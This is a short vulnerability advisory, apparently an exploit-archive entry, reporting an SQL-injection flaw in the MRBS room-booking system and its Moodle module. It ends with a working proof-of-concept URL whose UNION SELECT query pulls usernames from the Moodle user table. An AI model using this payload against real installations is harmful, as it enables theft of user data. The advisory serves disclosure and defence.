9 lines
No EOL
724 B
Text
Executable file
9 lines
No EOL
724 B
Text
Executable file
source: http://www.securityfocus.com/bid/26977/info
|
|
|
|
MRBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle.
|
|
|
|
http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007 |